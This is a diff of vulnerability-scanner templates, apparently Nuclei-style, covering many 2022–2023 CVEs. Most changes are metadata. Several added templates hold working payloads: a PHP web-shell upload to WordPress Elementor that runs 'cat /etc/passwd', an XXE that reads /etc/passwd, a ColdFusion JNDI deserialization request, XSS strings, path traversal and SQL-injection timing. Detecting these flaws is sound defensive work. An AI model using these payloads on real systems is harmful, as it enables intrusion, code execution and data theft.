epss-percentile: 0.44504 epss-percentile: 0.43631
cpe: cpe:2.3:a:atmail:atmail:6.5.0:*:*:*:*:*:*:* cpe: cpe:2.3:a:atmail:atmail:6.5.0:*:*:*:*:*:*:*
metadata: metadata:
verified: true verified: true
@ -52,4 +52,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a0047304502203171cb9a5a9125732f06bba74b71efc2e09ae7c92ad33bcca6e6356b5d541fe702210081422e4791a4a926b08807deffab9bf4cb8eab98c0f9897922d586b01218bf06:922c64590222798bb761d5b6d8e72950 # digest: 4a0a0047304502210098e7e92637618d4c3c5540938565842f9d2479c1b7a7ca9a9333b2e0bf64a29b022077e0d1d54bd671842a9ba69fdbad1ed67e8c6f085c3235fde69b2d9e18009833:922c64590222798bb761d5b6d8e72950

View File

@ -37,7 +37,7 @@ variables:
http: http:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/doAs?=`{{url_encode("{{command}}")}}`' - '{{BaseURL}}/?doAs=`{{url_encode("{{command}}")}}`'
matchers-condition: and matchers-condition: and
matchers: matchers:
@ -45,4 +45,4 @@ http:
part: body part: body
words: words:
- "19833-2202-EVC" - "19833-2202-EVC"
# digest: 4a0a004730450221008bb8dca83860e99f6649206e34e12203a4ef600bbafcd7ae6b135b537faab9990220205c3ed10d667efd9a2e7f2128c855334fab697f0bf55bf5792362c774f88c91:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100c1235eac532c6d726073650001ee75a510e3d2b869c6174b06e4a249f1d236090220564440e9e87fc5f90b25cfc4108c5aa04b592bc0e6c584c01fec85b312622f08:922c64590222798bb761d5b6d8e72950

View File

@ -6,28 +6,29 @@ info:
severity: medium severity: medium
description: | description: |
RStudio Connect prior to 2023.01.0 is affected by an Open Redirect issue. The vulnerability could allow an attacker to redirect users to malicious websites. RStudio Connect prior to 2023.01.0 is affected by an Open Redirect issue. The vulnerability could allow an attacker to redirect users to malicious websites.
impact: |
An attacker can exploit the vulnerability to redirect users to malicious websites, potentially leading to phishing attacks or other security breaches.
remediation: |
This issue is fixed in Connect v2023.05. Additionally, for users running Connect v1.7.2 and later, the issue is resolvable via a configuration setting mentioned in the support article.
reference: reference:
- https://tenable.com/security/research/tra-2022-30 - https://tenable.com/security/research/tra-2022-30
- https://support.posit.co/hc/en-us/articles/10983374992023-CVE-2022-38131-configuration-issue-in-Posit-Connect - https://support.posit.co/hc/en-us/articles/10983374992023-CVE-2022-38131-configuration-issue-in-Posit-Connect
- https://github.com/JoshuaMart/JoshuaMart - https://github.com/JoshuaMart/JoshuaMart
impact: |
An attacker can exploit the vulnerability to redirect users to malicious websites, potentially leading to phishing attacks or other security breaches.
remediation: |
This issue is fixed in Connect v2023.05. Additionally, for users running Connect v1.7.2 and later, the issue is resolvable via a configuration setting mentioned in the support article.
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1 cvss-score: 6.1
cve-id: CVE-2022-38131 cve-id: CVE-2022-38131
cwe-id: CWE-601 cwe-id: CWE-601
cpe: cpe:2.3:a:rstudio:connect:*:*:*:*:*:*:*:*
epss-score: 0.0006 epss-score: 0.0006
epss-percentile: 0.23591 epss-percentile: 0.23591
cpe: cpe:2.3:a:rstudio:connect:*:*:*:*:*:*:*:*
metadata: metadata:
product: connect
shodan-query: "http.favicon.hash:217119619"
fofa-query: "app=\"RStudio-Connect\""
max-request: 1
verified: true verified: true
vendor: rstudio vendor: rstudio
product: connect
shodan-query: http.favicon.hash:217119619
fofa-query: app="RStudio-Connect"
tags: tenable,cve,cve2022,redirect,rstudio tags: tenable,cve,cve2022,redirect,rstudio
http: http:
@ -46,4 +47,4 @@ http:
- type: status - type: status
status: status:
- 307 - 307
# digest: 4a0a00473045022100e9632f43574d44779bc09a10a78cb6835cc4b0179a707b395efecda59dcb8b5402205a72129b99d873d786c6aa9062e142a0b02192b31aa930c1a234a6d61558b479:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100aed598584561fa1188599f4a3fa2ff5ae9149e94b624fef3be306a7a74429c3f02201c02b4ebc6bfa15076a56527dc53df6e0be1e5d7f890dbc1558b26e30d35059b:922c64590222798bb761d5b6d8e72950

View File

@ -18,8 +18,8 @@ info:
cvss-score: 7.5 cvss-score: 7.5
cve-id: CVE-2022-4140 cve-id: CVE-2022-4140
cwe-id: CWE-552 cwe-id: CWE-552
epss-score: 0.01317 epss-score: 0.00932
epss-percentile: 0.84504 epss-percentile: 0.82572
cpe: cpe:2.3:a:collne:welcart_e-commerce:*:*:*:*:*:wordpress:*:* cpe: cpe:2.3:a:collne:welcart_e-commerce:*:*:*:*:*:wordpress:*:*
metadata: metadata:
verified: true verified: true
@ -54,4 +54,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4b0a00483046022100c309f56d1bc6b8b3ad4aeedfea6624e9072d042193f145856563965410ce9e7c022100cc3f6acff92ea09cb461e67964a2e5973fbb82fdd391e5176e287a0be8c759c1:922c64590222798bb761d5b6d8e72950 # digest: 490a0046304402200691e9b2e104e67432ef4041648aca88eaa5a1fc58bbc764da8a0cf8240733da022015c0a0d07bcd6552d8c77f685c7c9bc595e3e7e9f3d8bf9b201968fcd4af75b4:922c64590222798bb761d5b6d8e72950

View File

@ -17,7 +17,7 @@ info:
cve-id: CVE-2023-0552 cve-id: CVE-2023-0552
cwe-id: CWE-601 cwe-id: CWE-601
epss-score: 0.00086 epss-score: 0.00086
epss-percentile: 0.35637 epss-percentile: 0.34914
cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:*
metadata: metadata:
verified: true verified: true
@ -38,4 +38,4 @@ http:
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$' - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$'
# digest: 4a0a004730450221008eccfd0ecd7398b3566c5cfec47a5d3396899495831dabbee13a144918b2127e0220232a7e35aba58e28f2c38ac75f7f4558d7419e63c82e7b145dba6569f3e52fcf:922c64590222798bb761d5b6d8e72950 # digest: 490a0046304402201ab8dcd9693d8e9c7b7e3c2ac162de7610f21d7c3523e623a005ecdeababa57902203039fe388db8f4aef6c49c40a2cff545792484a6dda13261675b612810c874f9:922c64590222798bb761d5b6d8e72950

View File

@ -28,7 +28,7 @@ info:
vendor: citrix vendor: citrix
product: sharefile_storage_zones_controller product: sharefile_storage_zones_controller
shodan-query: title:"ShareFile Storage Server" shodan-query: title:"ShareFile Storage Server"
tags: cve2023,cve,sharefile,rce,intrusive,fileupload,brute-force,kev,citrix tags: cve2023,cve,sharefile,rce,intrusive,fileupload,bruteforce,kev,citrix
variables: variables:
fileName: '{{rand_base(8)}}' fileName: '{{rand_base(8)}}'
@ -61,4 +61,4 @@ http:
- type: dsl - type: dsl
dsl: dsl:
- 'BaseURL+ "/cifs/" + fileName + ".aspx"' - 'BaseURL+ "/cifs/" + fileName + ".aspx"'
# digest: 4a0a00473045022100b8908e3d0d507eafb4daa66943662e7f35d530024af777cd331040b9eda4540d022022868e31a2dbfcfb4347f872741b77feac8ac0a89509d5d3fc045ecd373c196d:922c64590222798bb761d5b6d8e72950 # digest: 4a0a0047304502205ab85a74f3c255c163c9d99bda2ff69666328d81782c9b4a8c2bc1d63128106b022100c10ae18b7db4ed08a5e2b324af93397140801b423282274cc2cbe4ddb0e93b0a:922c64590222798bb761d5b6d8e72950

View File

@ -22,7 +22,7 @@ info:
cve-id: CVE-2023-26255 cve-id: CVE-2023-26255
cwe-id: CWE-22 cwe-id: CWE-22
epss-score: 0.15138 epss-score: 0.15138
epss-percentile: 0.95348 epss-percentile: 0.95663
cpe: cpe:2.3:a:stagil:stagil_navigation:*:*:*:*:*:jira:*:* cpe: cpe:2.3:a:stagil:stagil_navigation:*:*:*:*:*:jira:*:*
metadata: metadata:
max-request: 1 max-request: 1
@ -52,4 +52,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a0047304502203d3f6c5452e186ee057389d3819be8e0fb41db7582a366b90ee39072f3c7d77f022100a9a161043ec3d29f43d105a2fd562bb509c5f7b85392ff6516cb29dde828f5b9:922c64590222798bb761d5b6d8e72950 # digest: 4a0a004730450221009eff1cfcd9afb5c04d7b263baaf2ff4faf43631d4e6eaf033ca3c6b8fd85de5d022060065320c9d8eac58e06f71ddabfeaecb433875fa230c89a4015e129415c44f3:922c64590222798bb761d5b6d8e72950

View File

@ -6,28 +6,29 @@ info:
severity: critical severity: critical
description: | description: |
The Gift Cards (Gift Vouchers and Packages) WordPress Plugin, version <= 4.3.1, is affected by an unauthenticated SQL injection vulnerability in the template parameter in the wpgv_doajax_voucher_pdf_save_func action. The Gift Cards (Gift Vouchers and Packages) WordPress Plugin, version <= 4.3.1, is affected by an unauthenticated SQL injection vulnerability in the template parameter in the wpgv_doajax_voucher_pdf_save_func action.
impact: |
Successful exploitation of this vulnerability could allow an attacker to perform SQL injection attacks, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.
remediation: |
Update the Gift Cards (Gift Vouchers and Packages) WordPress Plugin to the latest version available.
reference: reference:
- https://www.tenable.com/security/research/tra-2023-2 - https://www.tenable.com/security/research/tra-2023-2
- https://wordpress.org/plugins/gift-voucher/ - https://wordpress.org/plugins/gift-voucher/
- https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/cvemon
- https://github.com/JoshuaMart/JoshuaMart - https://github.com/JoshuaMart/JoshuaMart
impact: |
Successful exploitation of this vulnerability could allow an attacker to perform SQL injection attacks, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.
remediation: |
Update the Gift Cards (Gift Vouchers and Packages) WordPress Plugin to the latest version available.
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8 cvss-score: 9.8
cve-id: CVE-2023-28662 cve-id: CVE-2023-28662
cwe-id: CWE-89 cwe-id: CWE-89
cpe: cpe:2.3:a:codemenschen:gift_vouchers:*:*:*:*:*:wordpress:*:*
epss-score: 0.00076 epss-score: 0.00076
epss-percentile: 0.31593 epss-percentile: 0.31593
cpe: cpe:2.3:a:codemenschen:gift_vouchers:*:*:*:*:*:wordpress:*:*
metadata: metadata:
vendor: codemenschen vendor: codemenschen
product: gift_vouchers product: "gift_vouchers"
framework: wordpress framework: wordpress
fofa-query: body="/wp-content/plugins/gift-voucher/" fofa-query: "body=\"/wp-content/plugins/gift-voucher/\""
max-request: 2
tags: cve,cve2023,wordpress,wp,wp-plugin,sqli,unauth,gift-voucher tags: cve,cve2023,wordpress,wp,wp-plugin,sqli,unauth,gift-voucher
flow: http(1) && http(2) flow: http(1) && http(2)
@ -59,4 +60,4 @@ http:
- status_code == 500 - status_code == 500
- contains(body, 'critical error') - contains(body, 'critical error')
condition: and condition: and
# digest: 490a00463044022009c58d25fec3c30e1ad3887484383645315f8e71fe821a509bf323cff77eb615022072f0bfae8790782eb15f69313e0ba60c76e9b1431b1bd18cf6842ca56ad685a9:922c64590222798bb761d5b6d8e72950 # digest: 4b0a00483046022100897f4b8dcfa22ad10a9b4881331ba0166610d2d1f177506cf60e47094c3bfbea022100b256673611bdf13504dc6bf1875ba960441fb7f9bb60ec748474e98d2c76d3fc:922c64590222798bb761d5b6d8e72950

View File

@ -13,13 +13,14 @@ info:
- https://twitter.com/wvuuuuuuuuuuuuu/status/1694956245742923939 - https://twitter.com/wvuuuuuuuuuuuuu/status/1694956245742923939
- https://forums.ivanti.com/s/article/Avalanche-Vulnerabilities-Addressed-in-6-4-1?language=en_US - https://forums.ivanti.com/s/article/Avalanche-Vulnerabilities-Addressed-in-6-4-1?language=en_US
- https://nvd.nist.gov/vuln/detail/CVE-2023-32563 - https://nvd.nist.gov/vuln/detail/CVE-2023-32563
- https://github.com/mayur-esh/vuln-liners
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8 cvss-score: 9.8
cve-id: CVE-2023-32563 cve-id: CVE-2023-32563
cwe-id: CWE-22 cwe-id: CWE-22
epss-score: 0.43261 epss-score: 0.42647
epss-percentile: 0.97013 epss-percentile: 0.97218
cpe: cpe:2.3:a:ivanti:avalanche:*:*:*:*:*:*:*:* cpe: cpe:2.3:a:ivanti:avalanche:*:*:*:*:*:*:*:*
metadata: metadata:
max-request: 2 max-request: 2
@ -56,4 +57,4 @@ http:
part: body_2 part: body_2
words: words:
- "CVE-2023-32563" - "CVE-2023-32563"
# digest: 4b0a0048304602210095f0377361174bf0f18bb6b480904a01bad012dd184abcf963d328e084a7cf45022100aa4c0a0aad45a19e6fb8fd3dc956cc89ac088f8ed744c630eb9b9cd5d1ad38ee:922c64590222798bb761d5b6d8e72950 # digest: 490a004630440220277c51026fc6ee497604b9edf835b895ebb5f041702564b51386e1aff926cdd502206a64318799d865c7590bca991daf364669b8257fa8d74439d3aada9f801eb608:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,52 @@
id: CVE-2023-38203
info:
name: Adobe ColdFusion - Deserialization of Untrusted Data
author: yiran
severity: critical
description: |
Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
remediation: |
Upgrade to Adobe ColdFusion version ColdFusion 2018 Update 18, ColdFusion 2021 Update 8, ColdFusion 2023 Update2 or later to mitigate this vulnerability.
reference:
- https://blog.projectdiscovery.io/adobe-coldfusion-rce/
- https://nvd.nist.gov/vuln/detail/CVE-2023-38203
- https://github.com/Ostorlab/KEV
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-38203
cwe-id: CWE-502
epss-score: 0.517
epss-percentile: 0.97465
cpe: cpe:2.3:a:adobe:coldfusion:2018:-:*:*:*:*:*:*
metadata:
max-request: 1
vendor: adobe
product: coldfusion
shodan-query: http.component:"Adobe ColdFusion"
fofa-query: app="Adobe-ColdFusion"
tags: cve,cve2023,adobe,rce,coldfusion,deserialization,kev
variables:
callback: "{{interactsh-url}}"
jndi: "ldap%3a//{{callback}}/zdfzfd"
http:
- raw:
- |
POST /CFIDE/adminapi/base.cfc?method= HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
argumentCollection=<wddxPacket+version%3d'1.0'><header/><data><struct+type%3d'xcom.sun.rowset.JdbcRowSetImplx'><var+name%3d'dataSourceName'><string>{{jndi}}</string></var><var+name%3d'autoCommit'><boolean+value%3d'true'/></var></struct></data></wddxPacket>
matchers:
- type: dsl
dsl:
- contains(interactsh_protocol, "dns")
- contains(body, "ColdFusion documentation")
condition: and
# digest: 490a0046304402203c66abf1d15e27f2367ab893430e1e93755ed0bc0192120015a9ccd034b1c5e3022056f16b7ba4c51d0bd6e741d47e92f84e7d7e63c54708dd3600bb37c9789e887a:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,48 @@
id: CVE-2023-40355
info:
name: Axigen WebMail - Cross-Site Scripting
author: amir-h-fallahi
severity: medium
description: |
Cross Site Scripting (XSS) vulnerability in Axigen versions 10.3.3.0 before 10.3.3.59, 10.4.0 before 10.4.19, and 10.5.0 before 10.5.5, allows authenticated attackers to execute arbitrary code and obtain sensitive information via the logic for switching between the Standard and Ajax versions.
reference:
- https://www.axigen.com/knowledgebase/Axigen-WebMail-XSS-Vulnerability-CVE-2023-40355-_396.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-40355
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
cvss-score: 6.5
cve-id: CVE-2023-40355
cwe-id: CWE-79
epss-score: 0.0006
epss-percentile: 0.22931
metadata:
max-request: 3
verified: true
shodan-query: http.favicon.hash:-1247684400
tags: cve,cve2023,xss,axigen,webmail
http:
- method: GET
path:
- "{{BaseURL}}/index.hsp?passwordExpired=yes&username=\\'-alert(document.domain),//"
- "{{BaseURL}}/index.hsp?passwordExpired=yes&domainName=\\'-alert(document.domain),//"
- "{{BaseURL}}/index.hsp?m=',alert(document.domain),'"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "\\\\'-alert(document.domain),//"
- "',alert(document.domain),'"
condition: or
- type: dsl
dsl:
- 'contains(header, "text/html")'
- 'contains(response, "Axigen")'
- 'status_code == 200'
condition: and
# digest: 4a0a004730450220183b57c2a71cd7ef299bd414a8937c4136c8b85301e19179a0c81d9e03454d94022100dafbcf2eb06bc385aa209e451c3cde44a73316a406d1ddb139523148c439adbd:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,39 @@
id: CVE-2023-42344
info:
name: OpenCMS - XML external entity (XXE)
author: 0xr2r
severity: high
description: |
users can execute code without authentication. An attacker can execute malicious requests on the OpenCms server. When the requests are successful vulnerable OpenCms can be exploited resulting in an unauthenticated XXE vulnerability. Based on research OpenCMS versions from 9.0.0 to 10.5.0 are vulnerable.
reference:
- https://blog.qualys.com/product-tech/2023/12/08/opencms-unauthenticated-xxe-vulnerability-cve-2023-42344
- https://labs.watchtowr.com/xxe-you-can-depend-on-me-opencms/
remediation: Advised to upgrade to OpenCMS 10.5.1 or later to patch the vulnerability
metadata:
max-request: 2
fofa-query: "OpenCms-9.5.3"
verified: true
tags: cve,cve2023,xxe,opencms
http:
- method: POST
path:
- "{{BaseURL}}/opencms/cmisatom/cmis-online/query"
- "{{BaseURL}}/cmisatom/cmis-online/query"
headers:
Content-Type: "application/xml;charset=UTF-8"
Referer: "{{RootURL}}"
body: |
<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><cmis:query xmlns:cmis="<http://docs.oasis-open.org/ns/cmis/core/200908/>"><cmis:statement>&test;</cmis:statement><cmis:searchAllVersions>false</cmis:searchAllVersions><cmis:includeAllowableActions>false</cmis:includeAllowableActions><cmis:includeRelationships>none</cmis:includeRelationships><cmis:renditionFilter>cmis:none</cmis:renditionFilter><cmis:maxItems>100</cmis:maxItems><cmis:skipCount>0</cmis:skipCount></cmis:query>
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- "invalidArgument"
condition: and
# digest: 4a0a0047304502207dccf8dee9a6e05f16f56533d13329cf5bb1cac34d72692fef62fd33077527e20221009e14b0264ffda37db9a79c357a04a6512985d7c64cc6157addf5246d2ec24d1e:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,38 @@
id: CVE-2023-45671
info:
name: Frigate < 0.13.0 Beta 3 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
Frigate is an open source network video recorder. Before version 0.13.0 Beta 3, there is a reflected cross-site scripting vulnerability in any API endpoints reliant on the `/<camera_name>` base path as values provided for the path are not sanitized. Exploiting this vulnerability requires the attacker to both know very specific information about a user's Frigate server and requires an authenticated user to be tricked into clicking a specially crafted link to their Frigate instance. This vulnerability could exploited by an attacker under the following circumstances: Frigate publicly exposed to the internet (even with authentication); attacker knows the address of a user's Frigate instance; attacker crafts a specialized page which links to the user's Frigate instance; attacker finds a way to get an authenticated user to visit their specialized page and click the button/link. As the reflected values included in the URL are not sanitized or escaped, this permits execution arbitrary Javascript payloads. Version 0.13.0 Beta 3 contains a patch for this issue.
remediation: It has been fixed in version 0.13.0 Beta 3
reference:
- https://github.com/blakeblackshear/frigate/security/advisories/GHSA-jjxc-m35j-p56f
- https://nvd.nist.gov/vuln/detail/CVE-2023-45671
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 4.7
cve-id: CVE-2023-45671
cpe: cpe:2.3:a:frigate:frigate:0.13.0:beta1:*:*:*:*:*:*
metadata:
max-request: 1
verified: true
vendor: frigate
product: frigate
shodan-query: title:"Frigate"
tags: cve,cve2023,frigate,xss
http:
- method: GET
path:
- "{{BaseURL}}/api/%3Cimg%20src=%22%22%20onerror=alert(document.domain)%3E"
matchers:
- type: dsl
dsl:
- 'contains(body, "Camera named <img src=\"\" onerror=alert(document.domain)>")'
- 'contains(header, "text/html")'
- 'status_code == 404'
condition: and
# digest: 4b0a00483046022100cba5c4d12e50a528bb189f495e3c9da2618e5180146b4624cd3997b834063fe60221009b11601e94531407edaa7ee1e9dfb799e2167598089b2ddcdac99db6d1c3736f:922c64590222798bb761d5b6d8e72950

View File

@ -16,8 +16,9 @@ info:
cpe: cpe:2.3:a:ivanti:connect_secure:9.0:*:*:*:*:*:*:* cpe: cpe:2.3:a:ivanti:connect_secure:9.0:*:*:*:*:*:*:*
metadata: metadata:
vendor: ivanti vendor: ivanti
product: connect_secure product: "connect_secure"
shodan-query: html:"welcome.cgi?p=logo" shodan-query: "html:\"welcome.cgi?p=logo\""
max-request: 2
tags: cve,cve2023,kev,auth-bypass,ivanti tags: cve,cve2023,kev,auth-bypass,ivanti
http: http:
@ -48,4 +49,4 @@ http:
- 'contains(body_2, "block_message")' - 'contains(body_2, "block_message")'
- 'contains(header_2, "application/json")' - 'contains(header_2, "application/json")'
condition: and condition: and
# digest: 490a0046304402204614c79e65441e3043a41452c64e73db844daaec0a04ff4ec5d9999c51825f83022077d76a1a7ab3b0ab8fb364824bfe94bcf6ad07ef3fc21736ac56399d12397a58:922c64590222798bb761d5b6d8e72950 # digest: 490a0046304402204ad3fa1c2d287f2d56aad453123f1b51f179ee3f12ab4a01a78e376c8d3de46b022044b7912e398ea01a9fb5d948d162710fb8ece66b2fc48b8a9c82b38568a12c03:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,62 @@
id: CVE-2023-48777
info:
name: WordPress Elementor 3.18.1 - File Upload/Remote Code Execution
author: DhiyaneshDK
severity: critical
description: |
The plugin is vulnerable to Remote Code Execution via file upload via the template import functionality, allowing authenticated attackers, with contributor-level access and above, to upload files and execute code on the server.
remediation: Fixed in 3.18.2
reference:
- https://wpscan.com/vulnerability/a6b3b14c-f06b-4506-9b88-854f155ebca9/
metadata:
verified: true
max-request: 4
framework: wordpress
publicwww-query: "/wp-content/plugins/elementor/"
tags: cve,cve2023,elementor,file-upload,intrusive,rce,wpscan,wordpress,wp-plugin,authenticated
variables:
filename: "{{rand_base(6)}}"
payload: '{"import_template":{"action":"import_template","data":{"fileName":"/../../../../{{filename}}.php","fileData":"PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4="}}}'
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/post.php?post=1&action=elementor HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
actions={{url_encode(payload)}}&_nonce={{nonce}}&editor_post_id=1&initial_document_id=1&action=elementor_ajax
- |
GET /wp-content/{{filename}}.php?cmd=cat+/etc/passwd HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "regex('root:.*:0:0:', body_4)"
- "status_code_4 == 200"
condition: and
extractors:
- type: regex
internal: true
name: nonce
part: body
group: 1
regex:
- 'admin\\\/admin\-ajax\.php","nonce":"([0-9a-z]+)"'
# digest: 4b0a00483046022100b71e9b31dece4dcf31fbd4629f0aea2339c0ec8922cf20066400a2d2232bca0c02210091ea465a635a3c4c909c86e44122140e35c0f0fc6fb70e2e4182abe48c32c568:922c64590222798bb761d5b6d8e72950

View File

@ -14,14 +14,15 @@ info:
cvss-score: 5.4 cvss-score: 5.4
cve-id: CVE-2023-52085 cve-id: CVE-2023-52085
cwe-id: CWE-22 cwe-id: CWE-22
cpe: cpe:2.3:a:wintercms:winter:*:*:*:*:*:*:*:*
epss-score: 0.00046 epss-score: 0.00046
epss-percentile: 0.12483 epss-percentile: 0.12483
cpe: cpe:2.3:a:wintercms:winter:*:*:*:*:*:*:*:*
metadata: metadata:
vendor: wintercms vendor: wintercms
product: winter product: winter
shodan-query: title:"Winter CMS" shodan-query: "title:\"Winter CMS\""
fofa-query: title="Winter CMS" fofa-query: "title=\"Winter CMS\""
max-request: 4
tags: cve,cve2023,authenticated,lfi,wintercms tags: cve,cve2023,authenticated,lfi,wintercms
http: http:
@ -68,4 +69,4 @@ http:
regex: regex:
- '<input name="_token" type="hidden" value="([0-9a-zA-Z]{40})">' - '<input name="_token" type="hidden" value="([0-9a-zA-Z]{40})">'
internal: true internal: true
# digest: 490a0046304402205dc4e3489b8db4f6e587d569813f9eec4372432d2ed1350de8d8bc00c7d01a8d02207363f5db9a634f3a0973e7e364948a39da565ec0b5ea0f3ac1276c0fc7027331:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100edda67cd80bdd516aa4f6241fa72a9e1d6c1e240eb1d40d35ae9c44143ff025902206f496f8d850ad284d589527d8abd90bf13aa0414c007dad56d79ba9c57d33c59:922c64590222798bb761d5b6d8e72950

View File

@ -48,13 +48,13 @@ http:
path: path:
- "{{BaseURL}}/wp-login.php" - "{{BaseURL}}/wp-login.php"
headers: headers:
Cookie: wordpress_logged_in=" AND (SELECT 5025 FROM (SELECT(SLEEP(5)))NkcI) AND "tqKU"="tqKU Cookie: wordpress_logged_in=" AND (SELECT 5025 FROM (SELECT(SLEEP(7)))NkcI) AND "tqKU"="tqKU
matchers: matchers:
- type: dsl - type: dsl
dsl: dsl:
- 'duration>=5' - 'duration>=7'
- 'status_code == 200' - 'status_code == 200'
- 'contains(body, "wp-admin")' - 'contains(body, "wp-admin")'
condition: and condition: and
# digest: 490a004630440220711084c66864d0f0ed8c49720ebfc388d1902517733600bac42c326ca8ffe14702206f9bb4ad5b87af58606cf3c4970f194074fc852d625138497b225c64f7b89d6a:922c64590222798bb761d5b6d8e72950 # digest: 4a0a0047304502210093bf3e2e6772a217d1c09ef23feff29a86dcb2db0c7824b6ca669c673564321a02202f3ace02b3e57883eb764701f4c31c4a1cb5ba8cd42ea02ff8a8e23b05c547f9:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,62 @@
id: CVE-2023-6831
info:
name: mlflow - Path Traversal
author: byObin
severity: high
description: |
Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-6831
- https://github.com/mlflow/mlflow/commit/1da75dfcecd4d169e34809ade55748384e8af6c1
- https://huntr.com/bounties/0acdd745-0167-4912-9d5c-02035fe5b314
remediation: |
Upgrade Mlflow to version 2.9.2 or later to mitigate the vulnerability.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
cvss-score: 8.1
cve-id: CVE-2023-6831
cwe-id: CWE-22
cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:*
epss-score: 0.00046
epss-percentile: 0.12693
metadata:
vendor: lfprojects
product: mlflow
shodan-query: "http.title:\"mlflow\""
max-request: 2
verified: true
tags: cve,cve2023,mlflow,pathtraversal,lfprojects
http:
- raw:
- |
PUT /api/2.0/mlflow-artifacts/artifacts/{{randstr}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
{{randstr}}
- |
DELETE /api/2.0/mlflow-artifacts/artifacts/%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252Fetc%252fpasswd HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: header_2
words:
- "Content-Type: application/json"
- "Server: gunicorn"
condition: and
- type: word
part: body_2
words:
- "{}"
- type: status
status:
- 500
# digest: 490a00463044022032f829866528954cdb8ce1c5298787430b08b1d4550ab556b77f078e362da3e102207691a8b5b4639a9faf128176e590b98fc0841775bb6df00b97a7253772fe498a:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,56 @@
id: CVE-2023-6895
info:
name: Hikvision Intercom Broadcasting System - Command Execution
author: archer
severity: critical
description: |
Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE (HIK) version has an operating system command injection vulnerability. The vulnerability originates from the parameter jsondata[ip] in the file /php/ping.php, which can cause operating system command injection.
reference:
- https://github.com/FuBoLuSec/CVE-2023-6895/blob/main/CVE-2023-6895.py
- https://vuldb.com/?ctiid.248254
- https://vuldb.com/?id.248254
- https://github.com/Marco-zcl/POC
- https://github.com/d4n-sec/d4n-sec.github.io
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-6895
cwe-id: CWE-78
epss-score: 0.0008
epss-percentile: 0.32716
cpe: cpe:2.3:o:hikvision:intercom_broadcast_system:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: hikvision
product: intercom_broadcast_system
fofa-query: icon_hash="-1830859634"
tags: cve,cve2023,rce,hikvision
http:
